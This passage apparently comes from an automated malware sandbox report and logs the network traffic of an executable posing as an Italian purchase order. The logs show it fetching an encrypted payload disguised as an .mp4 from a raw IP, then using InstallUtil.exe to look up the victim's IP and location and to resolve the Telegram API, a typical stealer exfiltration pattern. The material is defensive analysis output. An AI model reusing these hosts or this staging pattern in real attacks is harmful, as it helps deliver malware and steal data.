Jan 16, 2025 13:10:28.876786947 CET	1.1.1.1	192.168.2.6	0x917d	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:10:28.876786947 CET	1.1.1.1	192.168.2.6	0x917d	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:10:28.876786947 CET	1.1.1.1	192.168.2.6	0x917d	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:10:29.822058916 CET	1.1.1.1	192.168.2.6	0xaca1	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:10:29.822058916 CET	1.1.1.1	192.168.2.6	0xaca1	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:10:29.822058916 CET	1.1.1.1	192.168.2.6	0xaca1	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:10:29.822058916 CET	1.1.1.1	192.168.2.6	0xaca1	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:10:29.822058916 CET	1.1.1.1	192.168.2.6	0xaca1	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:10:29.822058916 CET	1.1.1.1	192.168.2.6	0xaca1	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:10:29.822058916 CET	1.1.1.1	192.168.2.6	0xaca1	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:10:44.147016048 CET	1.1.1.1	192.168.2.6	0xabc7	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

160.22.121.182

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49709	160.22.121.182	80	6332	C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 13:10:01.576018095 CET	208	OUT	GET /STATO/Gihdpimpq.mp4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Host: 160.22.121.182 Connection: Keep-Alive
Jan 16, 2025 13:10:02.550004005 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 12:10:02 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Tue, 14 Jan 2025 12:43:10 GMT ETag: "102208-62ba9e74aa44d" Accept-Ranges: bytes Content-Length: 1057288 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: video/mp4 Data Raw: 41 95 78 92 64 17 6b 4e 5e 7b b2 e7 38 65 63 a2 11 01 ac 09 7a fe 8d 03 83 77 03 81 8d d7 5c eb 5c e1 e9 7e 21 85 e7 32 52 f5 92 09 2c de bf 70 b3 4c f1 2f 68 ba fe 7d b0 f3 78 60 3b de 46 10 bf 6e c6 0b e1 7a 10 d0 c2 07 71 bd bf a1 78 6a b1 b9 a4 e1 57 17 f0 0d 2f 25 4e 87 34 79 e6 48 05 4a 39 a8 37 18 29 01 7a 4c 7f a9 57 3c 1f f8 0b ee 2f 80 3f 59 4a c3 e5 c9 98 34 a6 1a 9b 84 d9 6f 86 75 e5 6f cd 98 a4 f3 40 ba b2 5b 19 03 e2 0c ca 6b c4 c4 42 d4 69 72 46 fc e3 e8 87 3e a7 13 37 1e 67 75 6d 52 be c1 75 48 87 fc e3 17 79 87 a5 37 7a 86 66 eb 06 10 ee 28 0f 83 35 15 4a 61 6f f6 ac 03 12 32 a2 fe aa 4f ee dc e2 fa 58 bf f7 97 36 89 a9 34 fa c7 4a e3 25 d1 c8 e5 47 cc a6 36 96 b4 fe 79 54 3e ca 47 72 77 57 b0 06 35 73 03 e6 70 c3 2c b4 01 3d e4 27 2c 4a 37 cb 02 47 f1 d5 35 8d 20 c4 ff c8 45 1e 49 33 e5 35 ed 5b 4d 84 37 85 a4 95 b3 b0 c7 f3 5e da c1 99 be 82 4f fc 71 4f 49 8c 1c a5 47 ae 9f c3 e4 6a 42 3d 4d 84 ab ab 77 4d 3e 0f a7 5e 4d 70 b3 e5 4f f0 b0 c3 32 9b 32 c1 79 9f 57 5a 5f 2a 63 88 d6 [TRUNCATED] Data Ascii: AxdkN^{8eczw\\~!2R,pL/h}x`;FnzqxjW/%N4yHJ97)zLW</?YJ4ouo@[kBirF>7gumRuHy7zf(5Jao2OX64J%G6yT>GrwW5sp,=',J7G5 EI35[M7^OqOIGjB=MwM>^MpO22yWZ_cRLq}<Sy4&FmM3KkgIE'ryp@jH2ZAow-sxhPFaZ\l EsVvIIHV\W_s5'6t-u{P2i4]<=5>\5"f\SgYFzcH4lgW]1osejo@I:4c[LIrA34-Kk,Tfz8X(AY:7WY$Z3W`yX+2\w_6[&pfue>PbL3_0vFUuow`7TP/((A^\|&,FcDa0fOv{i5fUU<'E9?SDTf} UK<U>'1[jDdaV03fy\EIlt~@3d)j;d\|
Jan 16, 2025 13:10:02.550055981 CET	1236	IN	Data Raw: 0f 0e e8 6b 63 59 e3 8f b1 ef 3d 3b bd a6 18 f3 50 9e 4c e2 59 6f 27 8c 4b 97 a4 92 2b 0b f5 42 4a 51 de 58 95 3c 2d ab 31 b9 c9 46 3b 89 af 6f 83 6b 4b 8a a2 6f 9c 00 92 0f fe 15 07 96 ab 2b c2 98 d2 22 05 29 42 23 f1 03 e3 36 28 9e d6 c6 6d 85 Data Ascii: kcY=;PLYo'K+BJQX<-1F;okKo+")B#6(me@RK'{T\=:AO+cfQ:O8l\VKCFIJz+?J{9~ou_V[<g>WypVXewVC=>Nu\("
Jan 16, 2025 13:10:02.550088882 CET	448	IN	Data Raw: e7 c1 cd 57 6d 84 01 38 3f 15 e7 99 eb 27 b0 04 93 6d 39 48 cf 49 ac a0 96 d3 c9 b8 25 d0 a8 16 14 40 8b 3f ad 40 f9 a2 98 52 26 2b 2c 14 a2 ae b8 16 e1 29 34 df 9b 6d f9 55 e7 08 9f 03 fe 77 e1 cc 8a ff 05 51 83 2a 02 6c ab c0 ee 01 93 9e 1e 85 Data Ascii: Wm8?'m9HI%@?@R&+,)4mUwQl8DT+GcM2tJjtlN$\|.q$<$A#F{Y/&qgi}#{P-#S'"x{Z/}fHc\atdU0Xj\pW
Jan 16, 2025 13:10:02.550121069 CET	1236	IN	Data Raw: 67 55 b1 cf 7c f4 d4 b9 85 45 0a e3 67 43 65 d6 3e a2 8f 0e 20 33 c1 3b 9f 70 40 0f d5 70 12 1b 48 9e 2b f8 52 42 b9 68 41 27 ef e3 9c 65 6e 6f c3 18 f3 c4 e0 12 e1 2a 12 e0 ae 61 c8 ba 4f 1f 1a f1 7a d2 94 34 3a 9a 42 77 4e 53 7f 0f af 65 7c a2 Data Ascii: gU\|EgCe> 3;p@pH+RBhA'eno*aOz4:BwNSe\|V.; 8`tl18%sL,9W{-5o[e`zpX0}R>~\e}"RP_W@Hp:D-HU5A7%
Jan 16, 2025 13:10:02.550174952 CET	1236	IN	Data Raw: 39 c3 e6 06 9b ae 24 f8 61 ba d5 eb c9 e5 87 9d 2f 7b cf df 6a 64 ba 70 07 d1 00 67 93 ec 7c ac 4e 65 f0 58 7b 3b d1 72 e8 38 ba b3 b1 bf 2f ad ec a6 fd 54 c6 1d 5e 4e 88 0d 14 ea 7f fb 69 0d af 99 ab 1b da a6 81 75 6a 61 d8 a6 ee 63 23 14 97 b0 Data Ascii: 9$a/{jdpg\|NeX{;r8/T^Niujac#y8&aCk?Ez9XS_>E$[1b.LtyE3mte++sucP:QEat0Iw%{72wjL8l[#;"Cjn
Jan 16, 2025 13:10:02.550209999 CET	448	IN	Data Raw: d4 a3 43 32 13 1c 64 18 de 28 8f 35 bb 49 52 13 f8 ec cf b4 72 7a 7e 1c da a7 06 85 4a 61 3f e7 1a 4f 31 a6 39 0e 97 24 f4 8d 3b 93 23 3b 1c 68 ce 3b 90 20 15 fc a1 b8 40 ca 37 2d c1 b0 69 b0 58 47 cd d2 13 fd 60 7f e2 92 2f 13 57 c7 94 6e 70 b2 Data Ascii: C2d(5IRrz~Ja?O19$;#;h; @7-iXG`/Wnp'?MY%a'PJqVa[#&T?%0-?j]J<2gdSYrjzI3kpCq"['#pwFO)mcFjSHw
Jan 16, 2025 13:10:02.806407928 CET	1236	IN	Data Raw: 77 88 46 81 ff 77 84 ef 46 09 84 00 14 6a 71 d5 84 af 42 77 83 2e 28 05 f5 00 d8 72 1b 46 17 c1 09 46 dc 6c d9 b1 a9 0c 4a 56 46 82 a3 9c ad cb ce a0 aa e3 a8 a4 d4 fb 2b 19 c9 d9 93 56 7a 4b 58 89 68 a7 10 4f 42 2d ad 4c 97 ff f0 68 23 07 d7 e4 Data Ascii: wFwFjqBw.(rFFlJVF+VzKXhOB-Lh#=.]+sn'4+IWuc1S1[yiA9t\gn^&?v/U$,ZyFQv^\|G{O\|Y_gN'kw,BCYo{`ik*ryi
Jan 16, 2025 13:10:02.806497097 CET	224	IN	Data Raw: 58 56 c3 6a 1e 26 ab 25 81 8b cb 01 ca 95 5a ab b3 88 bf 82 f6 0c dc 72 97 0e c1 19 d4 da d0 72 45 77 4a 06 12 1a ff a9 35 ce 83 d7 4e 27 f8 2e 2c 64 02 df 09 5b 47 e8 d6 61 21 eb 80 4d 77 dd f8 d3 72 74 39 7a 7f be d7 94 57 c8 ba 0b 9e ba 83 39 Data Ascii: XVj&%ZrrEwJ5N'.,d[Ga!Mwrt9zW9:;-@oQ)U*k#OSNUvJ3D~Z~^"=Qdw^lXN5QD[GC>d-urObI2@\|zM2hrfD8Yp
Jan 16, 2025 13:10:02.806509972 CET	1236	IN	Data Raw: 4e de bd 25 80 00 51 ec 6e cb 74 ba 29 ae ac a8 3b 55 c1 3e 9d 26 e7 34 e0 2b 75 3c fa b5 06 cc a8 41 e3 f4 11 01 67 69 77 eb 98 d4 f9 97 66 c8 5b 9a 5f 33 62 a7 22 12 05 4b 8d 6c 71 df 32 17 6e 25 c4 d3 db 16 31 be c7 c8 8a c8 48 e7 ef 16 ac b0 Data Ascii: N%Qnt);U>&4+u<Agiwf[_3b"Klq2n%1H~`b'wG}j.E!gJ$W96{g^2f^pM&[,czN0$3^M#\r2){kxVC AL`w{/&l#h
Jan 16, 2025 13:10:02.806534052 CET	1236	IN	Data Raw: 00 f1 7e 01 c6 96 fd 66 88 23 ca 21 cf 38 4a e4 8a e9 9b 61 ee 1d fa 47 bb eb 71 b4 23 bc 54 9c c5 2e ad b5 d7 0b 23 6a cb 22 a2 f0 7b 5b 2d 77 06 e0 78 da 58 b8 04 0d 70 57 72 ab 09 4c 81 80 73 6a fe f7 9c 3f 61 d4 4a 41 c5 a8 ee a2 c1 60 6d 08 Data Ascii: ~f#!8JaGq#T.#j"{[-wxXpWrLsj?aJA`mSKHSXdE$;FNY`=3_\1\&vx{VC(Ss7oQh^](JR2_5Op~8U>9bK~T\|
Jan 16, 2025 13:10:02.806550026 CET	1236	IN	Data Raw: 72 60 b7 9f 72 42 ee 9e d5 11 8e da 73 0e ef 79 ce 01 02 a3 79 5e 2f 4e 35 be 57 d0 f0 a6 4e c8 fd 6b 46 88 df 31 17 b8 e8 f2 b1 e1 5a 11 6e b4 f9 cd a3 36 46 0b 42 74 83 b9 4f b7 2b 03 ca 5d db f0 b7 b7 c9 40 31 31 58 de e7 80 51 ad 0b 73 42 e6 Data Ascii: r`rBsyy^/N5WNkF1Zn6FBtO+]@11XQsB3,>C<+Oh>]VJOWc]!ax6z)ei_o(vX'UJ@(&2\|70f=sokg/#2mY4sn/<[( 'f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49852	193.122.6.168	80	2676	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 13:10:28.888051987 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 13:10:29.513144016 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 12:10:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 16, 2025 13:10:29.521166086 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 16, 2025 13:10:29.706120968 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 12:10:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 16, 2025 13:10:30.499829054 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 16, 2025 13:10:30.685417891 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 12:10:30 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49870	193.122.6.168	80	2676	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 13:10:31.301990986 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 16, 2025 13:10:31.962192059 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 12:10:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49877	193.122.6.168	80	2676	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 13:10:32.586675882 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 13:10:33.212713957 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 12:10:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49889	193.122.6.168	80	2676	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 13:10:33.814343929 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 13:10:34.457321882 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 12:10:34 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49899	193.122.6.168	80	2676	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 13:10:35.050904036 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 13:10:35.757540941 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 12:10:35 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49908	193.122.6.168	80	2676	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 13:10:36.383310080 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 13:10:37.013123989 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 12:10:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49920	193.122.6.168	80	2676	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 13:10:37.631328106 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 13:10:38.267412901 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 12:10:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49858	104.21.48.1	443	2676	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 12:10:30 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-16 12:10:30 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 12:10:30 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2344219 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gmDdKTKyrRre4UpyHLil9iRa31xFn1hrcCxrOeW6JHNCVxncyQLIoAQm2WFoacqH6yXvx3vUE6DbUosiO2FV7%2FbJvCu26ubbFI7dRJtYwnoWBvay5SWo%2BbLD53QMHERTRHVaz%2FZw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902e00b42879c461-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1481&rtt_var=566&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1913499&cwnd=232&unsent_bytes=0&cid=5d7eacf8d1202507&ts=183&x=0"
2025-01-16 12:10:30 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49864	104.21.48.1	443	2676	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 12:10:31 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-16 12:10:31 UTC	851	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 12:10:31 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2344220 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xpEed0GPkl%2BmcFpfwKt5wX2FHe0Of9CL2kWHFtcJLcNgyQClnpLd3uWNaWL9Rq6LzUpWlZeiMilA3O1DPnldvUozY3Alo7LMnujH1jvfc6wyZeazs721cXsiZ3wuYQrkFtRePlUF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902e00b92a0343be-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1591&rtt_var=609&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1780487&cwnd=229&unsent_bytes=0&cid=aae299e4286181ff&ts=153&x=0"
2025-01-16 12:10:31 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49872	104.21.48.1	443	2676	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 12:10:32 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
